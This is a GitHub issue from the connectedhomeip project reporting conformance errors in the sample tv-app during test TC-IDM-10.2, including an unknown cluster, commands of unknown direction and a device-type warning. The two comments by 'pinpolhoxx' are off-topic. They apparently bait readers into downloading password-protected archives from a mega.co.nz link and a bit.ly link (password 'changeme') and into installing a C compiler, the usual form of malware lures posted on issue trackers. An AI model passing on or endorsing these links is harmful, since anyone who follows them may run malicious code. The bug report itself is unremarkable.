project-chip/connectedhomeip #35693: The sample tv-app needs to be updated to address multiple errors reported while validating the TC-IDM-10.2 (Tests cluster conformance for features, attributes and commands across all endpoints test case)

Rajashreekalmane, 2024-09-20:
Error Summary for Test Case: IDM-10.2 
Details: Problems with conformance identified during validation.
DUT : tv-app

- [ ] Unknown Cluster (1875):
The logs indicate that commands with unknown direction are being issued for cluster 1875 (0x753). This cluster is not recognized in the current specification.

- [ ] Commands with Unknown Direction:
For each command (2, 3, 4), there is a warning indicating an unknown direction.

- [ ] Proxy Discovery (Cluster 67):
Similar to the previous warnings, command 1 (0x01) for the ProxyDiscovery cluster is also flagged. The command's direction is unclear.

- [ ] Device Type Warning:
The warning regarding "Device type Introduction does not have an ID listed" implies that the device type is not fully defined.

Steps to Reproduce:
- From the Test-Harness user interface loaded the Media PICS file to select the test case.
- Selected the TC_IDM_10_2 Python test case to executed.
- Executed the below mentioned command to put DUT into a commissionable state, ./chip-tv-app
- Click the Start button on Test-Harness user interface.

**Environment**
Version: v2.11-beta3.1+fall2024
Sha: 9c1ef58

**PICS used to validate :**
[Media Cluster Test Plan.zip](https://github.com/user-attachments/files/17071761/Media.Cluster.Test.Plan.zip)

**Validation log :**
[TC-IDM-10.2 tv-app.log](https://github.com/user-attachments/files/17071758/TC-IDM-10.2.tv-app.log)

pinpolhoxx, 2024-09-20:
download
https://mega.co.nz/#!h7FUWTgJ!EBLwTfcj8qX2Q2_UCp-4N7KgdH2Hs9qNkvH4vjvN6II
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)

pinpolhoxx, 2024-09-20:
I think this will help you.

https://bit.ly/3TCbXO6
Archive codepass: changeme

you may need to install the c compiler

chrisdecenzo, 2024-10-16:
the description for this issue is pretty opaque